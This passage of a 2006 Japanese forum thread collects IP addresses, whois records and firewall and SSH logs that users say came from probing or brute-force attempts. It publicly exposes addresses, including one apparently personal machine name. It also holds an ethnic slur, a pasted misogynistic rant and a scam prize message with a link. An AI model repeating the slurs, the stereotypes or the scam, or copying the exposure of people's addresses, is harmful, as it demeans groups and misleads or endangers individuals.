730処刑ライダー ◆.EDMOUBKE2 :2006/03/14(火) 00:45:41
思わず検索かけちゃうぞ?
731名無しさん@お腹いっぱい。:2006/03/14(火) 08:29:07
IPアドレス 59.146.166.124
ホスト名 p92a67c.szoknt01.ap.so-net.ne.jp
732処刑ライダー ◆.EDMOUBKE2 :2006/03/14(火) 08:53:11
ルータのセキュリティ・ログもお祭り状態だな・・・。
733処刑ライダー ◆.EDMOUBKE2 :2006/03/14(火) 09:04:26
よく分からん世界だな・・・。
734名無しさん@お腹いっぱい。:2006/03/14(火) 09:07:48
IPアドレス 206.246.241.120
ホスト名 tawakoni.html.com

ほんと多いな
いつか恨みでも買ったかな
735名無しさん@お腹いっぱい。:2006/03/14(火) 12:36:22
61.125.152.248:135
攻撃されまくりんぐ
736名無しさん@お腹いっぱい。:2006/03/14(火) 13:09:32
IPアドレス 222.5.14.186
ホスト名 ZK014186.ppp.dion.ne.jp
IPアドレス
 割当国 ※ 日本 (JP)
都道府県 北海道
市外局番 --
接続回線 xDSL
737処刑ライダー ◆.EDMOUBKE2 :2006/03/14(火) 13:25:30
それは、どこかで見たことがあるような(笑
738処刑ライダー ◆.EDMOUBKE2 :2006/03/14(火) 16:41:10
http://mickey.mirv.net/2chnis.html

ああ、これかぁ。しかし、別タブ開いてたような気はするが、不思議だなぁ。
739名無しさん@お腹いっぱい。:2006/03/14(火) 16:51:53
222.162.246.244(CN)

なんでうちにwww.lineage2.jpが…?
740名無しさん@お腹いっぱい。:2006/03/14(火) 17:15:22
うちにもこないだ来たよwww.lineage2.jp
ボットとかの関係?ネトゲやらんからよくわからん。
741名無しさん@お腹いっぱい。:2006/03/14(火) 21:09:36
>>724
通報してやれw
742名無しさん@お腹いっぱい。:2006/03/14(火) 22:10:57
IPアドレス 220.106.47.225
ホスト名 p11225-adsau14honb8-acca.tokyo.ocn.ne.jp
IPアドレス
 割当国 ※ 日本 (JP)
都道府県 不明
市外局番 --
接続回線 xDSL

IPアドレス 61.213.172.117
ホスト名 server117.canalize.com
IPアドレス
 割当国 ※ 日本 (JP)
都道府県 該当なし
市外局番 該当なし
接続回線 該当なし

この二つがほぼ同じ時間に同時に攻撃してきたんだけど

743名無しさん@お腹いっぱい。:2006/03/14(火) 22:32:25
【積年の】旦那にしてる密かな仕返し【恨みじゃー】
http://human5.2ch.net/test/read.cgi/ms/1141694640/

8 名前:可愛い奥様[] 投稿日:2006/03/07(火) 11:05:23 ID:8dtluKkp
夫の歯ブラシで洗面所の排水溝掃除。
洗面所をビショビショに汚した罰だ。

20 名前:可愛い奥様[age] 投稿日:2006/03/08(水) 00:40:17 ID:pRrk6A21
前に頭きた時あって
1度だけ歯ブラシで肛門カキカキしちゃった

22 名前:可愛い奥様[] 投稿日:2006/03/08(水) 01:27:12 ID:gU5mHc7J
よかった。どこのお宅も同じようなことしてて。

24 名前:可愛い奥様[] 投稿日:2006/03/08(水) 01:36:35 ID:SSSFsTqE
そうそう、ヘンなモノはダンナのお皿へ直行だよね。

41 名前:可愛い奥様[] 投稿日:2006/03/08(水) 11:55:18 ID:sjj+/60Q
見てるだけで気が晴れるな!
皆さん、頑張ってね!

42 名前:可愛い奥様[sage] 投稿日:2006/03/08(水) 20:33:51 ID:Ju2N1s7+
年金分割が楽しみじゃのう

63 名前:可愛い奥様[] 投稿日:2006/03/10(金) 08:55:20 ID:qLfJYpJR
家族で密かにはぶっている。

男性は肉体が汚く、精神が美しい傾向がある。(気に入らない相手に肉体的攻撃を加える⇒精神的攻撃も加える男は猛者)
女は肉体が美しく、精神が汚い傾向がある。(気に入らない相手に精神的攻撃を加える⇒肉体的攻撃も加える女は猛者)
女は隠れて悪事をする。気に入らない女子を便所でボコったり、便器舐めさせたり、男の友人を使ってレイプ、仲間外れにしたり。陰口、嫉妬。
女は対人関係において、この汚い性格を隠そうとするため、外面が非常によくなる。(猫かぶり)
男性諸君は外面に騙されないように気を付けて下さい。
744名無しさん@お腹いっぱい。:2006/03/14(火) 22:53:31
IPアドレス 221.244.122.36
ホスト名 221x244x122x36.ap221.ftth.ucom.ne.jp
IPアドレス
 割当国 ※ 日本 (JP)
都道府県 不明
市外局番 --
接続回線 光

よく見てみると>>699と同じだ
745名無しさん@お腹いっぱい。:2006/03/15(水) 06:51:24
219.95.79.138(マレーシア)
156.17.85.20(オランダ)
746名無しさん@お腹いっぱい。:2006/03/16(木) 07:18:42
222.92.248.132(CN) verify.qq.com/getimage

何も出ないっつーの
747名無しさん@お腹いっぱい。:2006/03/16(木) 14:04:50
222.168.124.231(CN) http://www.yahoo.co.jp/http/www.yahoo.co.jp/

中国ってほんとにどうしようもないな
748名無しさん@お腹いっぱい。:2006/03/16(木) 14:26:22
だって中国だもん
749名無しさん@お腹いっぱい。:2006/03/16(木) 16:10:17
IPアドレス220.208.33.148
IPアドレス218.104.36.242
750名無しさん@お腹いっぱい。:2006/03/17(金) 02:01:01
Mar 16 18:20:19 kabe sshd[930]: refused connect from pc3.message1-unet.ocn.ne.jp
* 中略 *
Mar 16 18:29:56 kabe sshd[1277]: refused connect from pc3.message1-unet.ocn.ne.jp

a. [IPネットワークアドレス] 219.166.162.152/29
b. [ネットワーク名] MESSAGE-1
f. [組織名] メッセージワン株式会社
g. [Organization] MESSAGE ONE CORPORATION
m. [管理者連絡窓口] MK8019JP
n. [技術連絡担当者] MK8019JP
p. [ネームサーバ]

侵入できそうなところを見つけてはコンサルと称して強請りでもやってのか、この会社は。
751名無しさん@お腹いっぱい。:2006/03/17(金) 05:11:14
219.255.135.131

キムチ野郎w
752名無しさん@お腹いっぱい。:2006/03/17(金) 05:28:04
82.70-85-153.reverse.theplanet.com

70.85.153.82
753名無しさん@お腹いっぱい。:2006/03/18(土) 01:14:19 BE:511428285-
中国からワームがたくさん送られてくるのを何とかしてくれ。
多いときは10秒で30箇所くらいから送られてくるのは参った。
754名無しさん@お腹いっぱい。:2006/03/18(土) 15:14:14
202.103.178.230
嫌だなぁ、こいつ
755名無しさん@お腹いっぱい。:2006/03/19(日) 00:12:39
Network Information: [ネットワーク情報]
a. [IPネットワークアドレス] 219.122.128.0/18
b. [ネットワーク名] K-OPTICOM
f. [組織名] 株式会社ケイ・オプティコム
g. [Organization] K-Opticom Corporation
m. [管理者連絡窓口] YM555JP
n. [技術連絡担当者] YM555JP
n. [技術連絡担当者] HA3280JP
p. [ネームサーバ] ns1.eonet.ne.jp
p. [ネームサーバ] ns7.eonet.ne.jp
[割当年月日] 2002/11/21
[最終更新] 2005/12/21 13:38:19(JST)

上位情報
----------
株式会社ケイ・オプティコム (K-Opticom Corporation)
[割り振り] 219.122.128.0/17

下位情報
----------
該当するデータがありません。

こいつ、うざい。
756名無しさん@お腹いっぱい。:2006/03/19(日) 14:19:16
TCP SYN FLOOD攻撃:18回
IPアドレス 60.209.235.203
ホスト名 対応するホスト名がありません
IPアドレス割当国 ※ 中国 (CN)

TCP SYN FLOOD攻撃:19回
IPアドレス 219.153.17.207
ホスト名 対応するホスト名がありません
IPアドレス割当国 ※ 中国 (CN)

TCP SYN FLOOD攻撃:24回
IPアドレス 207.68.178.61
ホスト名 対応するホスト名がありません
IPアドレス割当国 ※ アメリカ合衆国 (US)

ポートスキャン:6回
IPアドレス 207.46.216.41
ホスト名 対応するホスト名がありません
IPアドレス割当国 ※ アメリカ合衆国 (US)

cnとかkrなんか国として蹴っちゃえばいいのに
757名無しさん@お腹いっぱい。:2006/03/19(日) 20:12:40
222.92.248.53

連中が中国だからなのか、それともこちらが日本だからなのか・・・。
758名無しさん@お腹いっぱい。:2006/03/20(月) 15:46:59
IPアドレス 219.99.205.242
ホスト名 adsl-1-7242.adsl.nsk.ne.jp
IPアドレス
 割当国 ※ 日本 (JP)
都道府県 不明
市外局番 --
接続回線 xDSL
759名無しさん@お腹いっぱい。:2006/03/20(月) 18:13:27
侵入:MS ASN1 Integer Overflow TCP
侵入者:58.78.240.199(1288)
危険度:高
プロトコル:TCP
760名無しさん@お腹いっぱい。:2006/03/20(月) 21:37:39 BE:255714454-
IP: 218.110.53.213
DNS: p6e35d5.tokynt01.ap.so-net.ne.jp
Node: 真野麻○江
Group: WORKGROUP
NetBIOS: WORKGROUP

ハァハァしてていいっすか?
761名無しさん@お腹いっぱい。:2006/03/21(火) 01:32:22
172.205.45.69 172.205.119.162 172.205.27.252
762名無しさん@お腹いっぱい。:2006/03/21(火) 14:27:18
207.68.178.61 アメリカ
218.28.144.2 中国
203.136.43.205 日本
202.222.30.208 日本
66.220.2.27 アメリカ
220.228.161.166 台湾
61.152.90.171 中国
58.215.68.214 中国
61.175.194.153 中国
219.154.55.233 中国
222.137.116.11 中国
222.139.154.29 中国

中国がやたら多い
763名無しさん@お腹いっぱい。:2006/03/21(火) 14:53:12
764名無しさん@お腹いっぱい。:2006/03/21(火) 16:54:41
どうやってsoftbankの所在県名を割り出すんですか?
サイトチェックじゃ分からないのですが
765名無しさん@お腹いっぱい。:2006/03/21(火) 17:27:05
自分も気になって検索してみたらでてきたよ
IPアドレスで検索してみて

ソフトバンク使ってて県名でないじゃんって喜んでたら・・・これですよ
766名無しさん@お腹いっぱい。:2006/03/21(火) 18:26:44
すごい、くだらないスレじゃね!
>>1ぶっ殺すよ!リンク個人向きじゃない。
アホくさい

URL無効じゃね wwwwwwwうっwwwwwwえっwwww
運営がウィルス張るような異常者とか
IPを無意味に感情で晒すDQNを記録してよ!!
プロバイダ変えれば、終わりだろ?じゃね

正直2chはこんなにウザったい年寄りが多いとは思わなかった!
秋葉原行くようなおじんとは話があわん!
こっちがスルーしてるのに煽ってきたり、いいかげんにしてほしい
暖房のがええわ
767名無しさん@お腹いっぱい。:2006/03/21(火) 18:41:43
IPアドレス 210.20.124.208
ホスト名 210-20-124-208.rev.home.ne.jp
IPアドレス
 割当国 ※ 日本 (JP)
都道府県 群馬県
市外局番 --
接続回線 CATV


>>766たぶん不正アクセスされて頭に来るから貼ってるんだよ。
768名無しさん@お腹いっぱい。:2006/03/21(火) 19:20:23
219.182.184.88
最近アクセス覆い
769名無しさん@お腹いっぱい。:2006/03/21(火) 22:53:57
( ^ω^)766はきっと辛いことがあったんだと思うお
770名無しさん@お腹いっぱい。:2006/03/22(水) 06:31:24
210.136.29.179:55510(pl435.nas923.p-shizuoka.nttpc.ne.jp)

218.139.63.20:1418(softbank218139063020.bbtec.net)
が物凄い突撃してくる。ウザス(;^ω^)
771名無しさん@お腹いっぱい。:2006/03/22(水) 15:40:26
TCP SYN FLOOD攻撃
80.82.17.20 フランス
210.148.115.86 日本
202.248.141.152 日本
202.248.141.156 日本
203.136.42.148 日本
218.27.19.247 中国
65.54.194.118 アメリカ
151.38.27.182 アメリカ
202.93.87.154 ヤフー
216.10.118.17 アメリカ

ポートスキャン
210.136.232.249 日本
203.136.42.148 日本
207.46.217.74 アメリカ
207.46.217.54 アメリカ
207.46.217.42 アメリカ
207.46.216.36 アメリカ
772名無しさん@お腹いっぱい。:2006/03/22(水) 17:28:43
163.51.60.251
eagle.im.kindai.ac.jp
a. [Network Number] 163.51.0.0/16
b. [Network Name] KNURINK
g. [Organization] Kinki University
m. [Administrative Contact] KK1254JP
n. [Technical Contact] HY033JP
p. [Nameserver] rs6000.cc.kindai.ac.jp
p. [Nameserver] tomato.cc.fuk.kindai.ac.jp
[Assigned Date] 1992/07/16
[Return Date]
[Last Update] 2005/08/23 12:02:36(JST)
773名無しさん@お腹いっぱい。:2006/03/22(水) 18:49:54
今日はポート139へのアクセスが山ほどあるが、ウイルスですか?
774名無しさん@お腹いっぱい。:2006/03/22(水) 20:22:57
現在現金で30万円獲得されております。
獲得方法を選択されるか100万円ジャンプアップをご選択下さ
い。
※23時までに連絡がない場合他の方に繰り上げされますのでご
了承下さい。
VIP様にオプションを
選べるプランが新しく
導入されました。
http://moneymoney.harisen.jp/0606/host.htm--------------------------------------
Celebrate Yahoo! JAPAN 10th Anniversary
http://pr.mail.yahoo.co.jp/10thann/
775名無しさん@お腹いっぱい。:2006/03/22(水) 21:35:43
>>773
あんたが繋いだノードにぶら下がっているやつらが、139を使うウィルスに感染しているバカが多いだけ
IPアドレスの頭から2つが同じやつらな
776名無しさん@お腹いっぱい。:2006/03/22(水) 22:49:08
218.229.206.169

叩いても何も出ないけど 鬱陶しいことこの上ない
777名無しさん@お腹いっぱい。:2006/03/22(水) 23:08:24
60.39.178.218
222.225.39.82
219.10.46.61
219.161.169.191
211.9.161.253
59.84.10.230





778名無しさん@お腹いっぱい。:2006/03/22(水) 23:18:07
220.111.189.94 広島 OCN 
779名無しさん@お腹いっぱい。:2006/03/22(水) 23:21:03
67.141.30.218 アメリカ
780名無しさん@お腹いっぱい。:2006/03/22(水) 23:26:54
IPアドレス 221.24.40.141
ホスト名 softbank221024040141.bbtec.net
IPアドレス
 割当国 ※ 日本 (JP)
都道府県 三重県
市外局番 --
接続回線 xDSL

トロイの木馬
781名無しさん@お腹いっぱい。:2006/03/23(木) 03:48:51
IPアドレス 169.254.88.59
ホスト名 対応するホスト名がありません
IPアドレス
 割当国 ※ 該当なし
都道府県 該当なし
市外局番 該当なし
接続回線 該当なし


晒す晒す漏れなく晒すw
782名無しさん@お腹いっぱい。:2006/03/23(木) 09:59:14
IPアドレス 211.132.68.47
ホスト名 PPP47.saitama-ip.dti.ne.jp
IPアドレス
 割当国 ※ 日本 (JP)
都道府県 埼玉県
市外局番 --
接続回線 フレッツISDN


だ埼玉から乙ww
783名無しさん@お腹いっぱい。:2006/03/23(木) 15:30:38
IPアドレス 211.135.41.53
ホスト名 対応するホスト名がありません
IPアドレス
 割当国 ※ 日本 (JP)
都道府県 該当なし
市外局番 該当なし
接続回線 該当なし
784名無しさん@お腹いっぱい。:2006/03/23(木) 16:41:09
221.152.101.46 韓国  ホストなし

221.141.27.92 韓国  ホストなし

10秒間に9回 送信先ポートをかえてアクセスしてくる

外国経由して誰かがアクセスしてるってこと?

なにがしたいんだか
785名無しさん@お腹いっぱい。:2006/03/23(木) 19:48:49
IP
221.170.209.108
FLA1AbS108.chb.mesh.ad.jp
786名無しさん@お腹いっぱい。:2006/03/24(金) 11:45:52
どうやったら、不正にアクセスされてるか分かるんですか?
一度、調べてみたいのですが。
787名無しさん@お腹いっぱい。:2006/03/24(金) 11:54:49
>>786
FWのログを見る。
788名無しさん@お腹いっぱい。:2006/03/24(金) 12:38:01
786ですけど
FWのログの見方が・・・分からないのです。
馬鹿ですみません。教えてください。
789名無しさん@お腹いっぱい。:2006/03/24(金) 13:08:41
786です
自己解決しました。
結構アクセスしてくるモンですね
790名無しさん@お腹いっぱい。:2006/03/24(金) 15:06:23
IPアドレスから地域を特定することってできますか?
791名無しさん@お腹いっぱい。:2006/03/24(金) 15:22:48
プロバイダによるけど日本の大体は都道府県ぐらいはわかるよ
792名無しさん@お腹いっぱい。:2006/03/24(金) 15:36:46
返答ありがとうございます。都道府県より詳しいことはわからないですか?
793名無しさん@お腹いっぱい。:2006/03/24(金) 16:11:16
金と時間があれば分かるがね
そこまでしてやるよりもはじいた方が楽だろ
794名無しさん@お腹いっぱい。:2006/03/24(金) 16:33:30
12.158.80.10 
216.10.118.18 
61.129.70.84 
221.112.20.67 
795名無しさん@お腹いっぱい。:2006/03/24(金) 21:04:46
IP
221.170.209.108
FLA1AbS108.chb.mesh.ad.jpはじいてください
796名無しさん@お腹いっぱい。:2006/03/24(金) 23:19:36
195.225.176.160
多分、ウクライナ
執拗にblogの方にトラックバックを延々と送りつけて来て、禿げしくうざい。
IPでググっても、結構、被害者いるみたいだし、.htaccess等で弾いておいた方が無難
797名無しさん@お腹いっぱい。:2006/03/25(土) 14:27:14
>>793
はじくってどうやってはじくの?
豆鉄砲とかでバキュンってやるのかな?
798名無しさん@お腹いっぱい。:2006/03/25(土) 15:02:52
そうだよ。
799名無しさん@お腹いっぱい。:2006/03/25(土) 15:17:03
結構難しいんだよね。
800名無しさん@お腹いっぱい。:2006/03/25(土) 15:50:30
う〜〜〜ん難しいです・・・・
モニタが豆鉄砲の威力で割れそうでつ・・・・・
801名無しさん@お腹いっぱい。:2006/03/25(土) 17:26:35
すべてsshポートへの不正ログインを試みられたものです。

60.28.39.80 逆引き不可 rootログイン試行
141.108.12.157 逆引き不可 適当なユーザー名+パスワードでの辞書攻撃
150.46.224.149 岡山大学 同上

辛うじて侵入はされていないが、sshでのパスワード認証完全禁止にしたほうがよいかも。

でも、一番腹が立ったのは、自宅から自分の実質的に専有するサーバにpsftpで繋いだときに、
サーバから自宅への応答が1025番のポートにいってしまったためサーバ乗っ取りと誤認され
上の管理者に通信を止められてしまったこと。
Mar 17 20:56:34 localhost sshd[11593]: Accepted password for ********* from 221.190.154.93 port 1025 ssh2
勘違いでクリーンインストールまで行く羽目になった身にもなってくれ・・・。
802名無しさん@お腹いっぱい。:2006/03/25(土) 17:40:20
>>801
60.28.39.80 中国 (CN)
141.108.12.157 欧州連合 (EU)
まぁ意味はないが
803名無しさん@お腹いっぱい。:2006/03/25(土) 20:54:08


61.121.33.19 ntmiex005199.miex.nt.isdn.ppp.infoweb.ne.jp
ntmiex005199.miex.nt.isdn.ppp.infoweb.ne.jp
804名無しさん@お腹いっぱい。:2006/03/26(日) 13:35:06
ZB061121.ppp.dion.ne.jp
192.168.0.5
テラウザスwwww
805名無しさん@お腹いっぱい。:2006/03/26(日) 13:36:34
>>804
ほんとうざいやつだな、オマイは。
806名無しさん@お腹いっぱい。:2006/03/26(日) 19:44:44
807名無しさん@お腹いっぱい。:2006/03/26(日) 20:24:43
>>804
おまえ・・・
808名無しさん@お腹いっぱい。:2006/03/27(月) 14:17:45
こんなの来てた。
Failed password for invalid user scanner from 133.41.199.82 port 49053 ssh2
www.surg2nd.hiroshima-u.ac.jp
大学病院のサーバー腐ってるぞ
809名無しさん@お腹いっぱい。:2006/03/27(月) 16:57:30
こいつ氏ねばいいと思う。

FTPにキチガイが来た。
18時から0時過ぎまで1〜2秒おきに不正ログイン(失敗)
それも13,770回!

不正に利用したユーザ名を繰り返す。
ADMINISTRATOR
TEST
GUEST
ADMIN
ADMINITRATOR
ADMINISTRATEUR

でADMINITRATOR、ADMINISTRATEURってなんだよ(ぷっ
バカじゃねーかこいつ。

IPアドレス => 「 24.223.208.80 」
ホスト名変換 => 「 user-0cdvk2g.cable.mindspring.com 」
IPアドレス問合せ先 「 whois.arin.net  (北アメリカおよびサブサハラ・アフリカ) 」
[Querying whois.arin.net]
[whois.arin.net]
Earthlink, Inc. ERLK-CBL-TW-CENTRAL (NET-24-223-128-0-1)
24.223.128.0 - 24.223.255.255
EARTHLINK, INC. ERLK-TW-NEW6 (NET-24-223-208-0-1)
24.223.208.0 - 24.223.215.255

たぶん何らかのウイルスの仕業だとは思うけど、
実被害がないからいいもののもし国内からあったら回数といいk察に届けてやる。
810名無しさん@お腹いっぱい。:2006/03/27(月) 19:43:20
fw 入れてあっても何度も来るやつってなんなの?
以前毎日のように来ていて来なくなったと思ったら
忘れた頃にまたやってくんの…うざい
811名無しさん@お腹いっぱい。:2006/03/28(火) 04:15:25
ここのところ、メールサーバーへのアタックがうざいです。
65.185.186.38
202.65.149.74
202.14.69.11
218.147.192.162
設定はしっかりやってあるのでrejectされてますが、とにかくうざい。
毎日1つはくる(アタックの数は十数回)。
812名無しさん@お腹いっぱい。:2006/03/28(火) 20:31:09
IPアドレス 210.236.187.220
ホスト名 dhcp187-219.ztv.ne.jp
IPアドレス
 割当国 ※ 日本 (JP)
都道府県 和歌山県
市外局番 --
接続回線 CATV
813名無しさん@お腹いっぱい。:2006/03/29(水) 13:15:47
ZM228085.ppp.dion.ne.jp
こいつを規制するにはppp.dion.ne.jpで規制しないとダメ?
814名無しさん@お腹いっぱい。:2006/03/29(水) 13:51:50
ホスト名 softbank219045016069.bbtec.net
IPアドレス
 割当国 ※ 日本 (JP)
都道府県 神奈川県
市外局番 --
接続回線 xDSL
815名無しさん@お腹いっぱい。:2006/03/29(水) 15:48:55
59.44.58.30(AU)
66.221.91.152(US)

珍しくCNかKR以外の国からお客さんが
816名無しさん@お腹いっぱい。:2006/03/29(水) 16:43:16
プロフからIPを抜くにはどうやったらいいんですか?
817名無しさん@お腹いっぱい。:2006/03/29(水) 19:19:47
Network Information: [ネットワーク情報]
a. [IPネットワークアドレス] 203.138.30.0/24
b. [ネットワーク名] TIKI
f. [組織名] 株式会社エヌディエス
g. [Organization] NDS CO., LTD.
m. [管理者連絡窓口] KS870JP
n. [技術連絡担当者] TH2192JP
p. [ネームサーバ] ns1.tiki.ad.jp
p. [ネームサーバ] ns2.tiki.ad.jp
[割当年月日] 2005/06/02
[返却年月日]
[最終更新] 2005/06/02 21:02:04(JST)

上位情報
----------
株式会社エヌ・ティ・ティ ピー・シー コミュニケーションズ (NTT PC Communications Incorporated)
[割り振り] 203.138.0.0/16
818名無しさん@お腹いっぱい。:2006/03/29(水) 20:04:40
>>815
59.44.58.30はCNでは?
819名無しさん@お腹いっぱい。:2006/03/29(水) 20:17:03
IPアドレス 202.75.235.177
ホスト名 177.235.75.202.tokyo.global.alpha-net.ne.jp
IPアドレス
 割当国 ※ 日本 (JP)
都道府県 不明
市外局番 --
接続回線 種別不明

今日の2時ぐらいから約1分間で140個ぐらいのログが残ってた・・・なんか気持ち悪い
820名無しさん@お腹いっぱい。:2006/03/29(水) 20:46:02
Network Information: [ネットワーク情報]
a. [IPネットワークアドレス] 210.135.99.0/24
b. [ネットワーク名] BARTOK-NET
f. [組織名] 株式会社ジェンマエンジニアリング
g. [Organization] Gemma Engineering
m. [管理者連絡窓口] AS116JP
n. [技術連絡担当者] AS116JP
p. [ネームサーバ] ns0.bartok.ad.jp
p. [ネームサーバ] ns1.bartok.ad.jp
[割当年月日] 2006/03/20
[返却年月日]
[最終更新] 2006/03/20 01:47:04(JST)

上位情報
----------
株式会社ジェンマエンジニアリング (Gemma Engineering)
[割り振り] 210.135.96.0/20

下位情報
----------
該当するデータがありません。

821名無しさん@お腹いっぱい。:2006/03/29(水) 21:02:06
不正アクセスして来てるかどうかってどうやって調べるんですか?
PCが勝手に起動したりと最近ちょっと変なのです。
822名無しさん@お腹いっぱい。:2006/03/29(水) 21:29:02
勝手に起動
それは霊障です。
823名無しさん@お腹いっぱい。:2006/03/29(水) 21:46:07
824名無しさん@お腹いっぱい。:2006/03/29(水) 22:04:53
>>822
911関連の告発で外人に目をつけられたっぽいです。
825名無しさん@お腹いっぱい。:2006/03/30(木) 10:26:29
Mar 30 05:57:42 *** sshd[12311]: (pam_unix) authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=dns.tk.itboost.co.jp
Mar 30 05:57:45 *** sshd[12311]: Failed password for invalid user takahashi from 61.195.147.99 port 47508 ssh2
f. [組織名] 株式会社 アイティーブースト
「企業IT化を加速するプロフェッショナル集団」って、まず自分とこのサーバをちゃんと管理してください。


826名無しさん@お腹いっぱい。:2006/03/30(木) 11:11:48
221.5.251.183
827名無しさん@お腹いっぱい。:2006/03/30(木) 17:09:52
P2P用に誰も使わないポートを開けたんだが
こいつだけが試行してきやがる・・・
今のとここいつだけずーっと連続で来る。

222.148.26.69 発信ポートは34624
828名無しさん@お腹いっぱい。:2006/03/30(木) 21:06:37
IPアドレス 220.108.36.152
ホスト名 i220-108-36-152.s05.a001.ap.plala.or.jp
IPアドレス
 割当国 ※ 日本 (JP)
都道府県 北海道
市外局番 --
接続回線 光
829名無し:2006/03/31(金) 13:47:14
830名無しさん@お腹いっぱい。:2006/03/31(金) 18:30:58
IPアドレス 218.229.152.74
ホスト名 eatkyo233074.adsl.ppp.infoweb.ne.jp
IPアドレス
 割当国 ※ 日本 (JP)
都道府県 東京都
市外局番 --
接続回線 xDSL
831名無しさん@お腹いっぱい。:2006/03/32(土) 01:32:39
おまいらここに載せてるIPポートスキャンしてんの?
832名無しさん@お腹いっぱい。:2006/03/32(土) 03:22:05
    ,, -‐''" ̄ ̄`゙ ヽ、
   /          \
  /             i
 ノ         ___ノ
(____,,--‐‐'''"⌒::::: l.川
  . |(●),   、(●)、.: |川     ?
  |   ,,ノ(、_, )ヽ、,, .:::: |リリ    
.   |   mj |=‐ァ'  .:::: |(((
 彡\,〈__ノニニ´ .:::/ミミ
  /ノ  ノ -‐‐一´\
833名無しさん@お腹いっぱい。:2006/03/32(土) 13:45:17
a. [IPネットワークアドレス] 211.131.0.0/16
b. [ネットワーク名] ODN
f. [組織名] オープンデータネットワーク(日本テレコム株式会社)
g. [Organization] Open Data Network(JAPAN TELECOM CO.,LTD.)
m. [管理者連絡窓口] YN234JP
n. [技術連絡担当者] YN234JP
p. [ネームサーバ] ns2.odn.ne.jp
p. [ネームサーバ] ns4.odn.ne.jp
[割当年月日] 2000/09/27
[返却年月日]
[最終更新] 2000/11/27 15:44:02(JST)

上位情報
----------
日本テレコム株式会社 (JAPAN TELECOM CO.,LTD.)
[割り振り] 211.131.0.0/16

下位情報
----------
該当するデータがありません。

834名無しさん@お腹いっぱい。:2006/03/32(土) 15:11:26
Network Information: [ネットワーク情報]
a.[IPネットワークアドレス]210.136.232.128/25
b.[ネットワーク名]VALUECOM
f.[組織名]バリューコマース株式会社
g.[Organization]Value Commerce Co.,Ltd.
m.[管理者連絡窓口]MN4916JP
n.[技術連絡担当者]MN4916JP
p.[ネームサーバ]
[割当年月日]2002/02/20
[返却年月日]
[最終更新]2002/02/20 14:34:04(JST)

上位情報
----------
株式会社エヌ・ティ・ティ ピー・シー コミュニケーションズ (NTT PC Communications Incorporated)
[割り振り] 210.136.0.0/16
InfoSphere (株式会社NTTPCコミュニケーションズ) (InfoSphere (NTT PC Communications, Inc.))
SUBA-029-494 [SUBA] 210.136.232.0/24
835名無しさん@お腹いっぱい。:2006/03/32(土) 15:29:36
>>833とか>>834みたいなアホどうにかならんのか
836名無しさん@お腹いっぱい。:2006/03/32(土) 16:43:44
Whois全部貼ってるおまえ
ウザいから書き込むな!
837名無しさん@お腹いっぱい。:2006/03/32(土) 17:07:48
>>836
ウザいなら見に来なくていいよ
おまえ一人居なくても誰も困らんし
838名無しさん@お腹いっぱい。:2006/03/32(土) 22:18:45
【レス抽出】
対象スレ: 不正アクセスしてくるIPを晒すスレ Part8
キーワード: ウザいから書き込むな

244 名前:名無しさん@お腹いっぱい。[sage] 投稿日:2005/12/13(火) 16:33:28
httpサーバーからセットでアクセスされているおまえ
ウザいから書き込むな!

582 名前:名無しさん@お腹いっぱい。[sage] 投稿日:2006/02/13(月) 15:41:20
Whois全部貼ってるおまえ
ウザいから書き込むな!

836 名前:名無しさん@お腹いっぱい。[sage] 投稿日:2006/03/32(土) 16:43:44
Whois全部貼ってるおまえ
ウザいから書き込むな!

抽出レス数:3
839名無しさん@お腹いっぱい。:2006/03/32(土) 23:13:47
[Querying whois.apnic.net]
[whois.apnic.net]
% [whois.apnic.net node-2]
% Whois data copyright terms http://www.apnic.net/db/dbcopyright.html

inetnum: 219.146.0.0 - 219.147.31.255
netname: CHINATELECOM-sd
descr: CHINANET shandong province network
descr: China Telecom
descr: No.31,jingrong street
descr: Beijing 100032
country: CN
admin-c: CH93-AP
tech-c: WG1-AP
mnt-by: MAINT-CHINANET
mnt-lower: MAINT-CHINATELECOM-sd
changed: [email protected] 20030820
status: ALLOCATED NON-PORTABLE
source: APNIC

person: Chinanet Hostmaster
nic-hdl: CH93-AP
e-mail: [email protected]
address: No.31 ,jingrong street,beijing
address: 100032
phone: +86-10-58501724
fax-no: +86-10-58501724
country: CN
changed: [email protected] 20051212
mnt-by: MAINT-CHINANET
source: APNIC
840名無しさん@お腹いっぱい。:2006/03/32(土) 23:59:26
それで?
841名無しさん@お腹いっぱい。:2006/04/02(日) 00:24:27

IPアドレス 210.157.21.145
ホスト名 unused-210-157-021-145.interq.or.jp
IPアドレス
 割当国 ※ 日本 (JP)
都道府県 該当なし
市外局番 該当なし
接続回線 該当なし
842名無しさん@お腹いっぱい。:2006/04/02(日) 09:38:34
IPアドレス 72.194.104.46
ホスト名 ip72-194-104-46.oc.oc.cox.net
IPアドレス
割当国 ※ アメリカ合衆国 (US)


なんかもう既に100回以上こいつから来るんだが・・・
アメリカからだからなんか怖いわけだが・・・大丈夫かな。
843名無しさん@お腹いっぱい。:2006/04/02(日) 11:52:36
p6081-ipad202niigatani.niigata.ocn.ne.jp
844名無しさん@お腹いっぱい。:2006/04/02(日) 11:54:59
IPアドレス 60.238.140.195
ホスト名 FLH1Aca195.chb.mesh.ad.jp
IPアドレス
割当国 ※ 日本 (JP)
都道府県 千葉県
市外局番 --
接続回線 光
845名無しさん@お腹いっぱい。:2006/04/02(日) 18:41:04
IPアドレス 221.83.120.16
ホスト名 softbank221083120016.bbtec.net
IPアドレス
 割当国 ※ 日本 (JP)
都道府県 鹿児島県
市外局番 --
接続回線 xDSL
846名無しさん@お腹いっぱい。:2006/04/03(月) 19:59:19
IPアドレス 218.226.113.244
ホスト名 eatkyo184244.adsl.ppp.infoweb.ne.jp
IPアドレス
 割当国 ※ 日本 (JP)
都道府県 東京都
市外局番 --
接続回線 xDSL

ぬっ頃したい
847名無しさん@お腹いっぱい。:2006/04/04(火) 11:38:30
p2043-ipbf301souka.saitama.ocn.ne.jp

このIPヤバイ?
層化って書いてあるんだけど
ALG.EXEからアクセスしてくるんだけど、停止したほうが良いかね?
848名無しさん@お腹いっぱい。:2006/04/04(火) 11:55:05
草加
849名無しさん@お腹いっぱい。:2006/04/04(火) 11:56:37
>>847
そうか?
850名無しさん@お腹いっぱい。:2006/04/04(火) 13:00:33
>>847
はいはいクマークマー
851名無しさん@お腹いっぱい。:2006/04/05(水) 09:53:09
さいたまー
852名無しさん@お腹いっぱい。:2006/04/05(水) 16:21:26
219.166.120.226 なんだこいつ、社員か?
853名無しさん@お腹いっぱい。:2006/04/05(水) 22:30:39
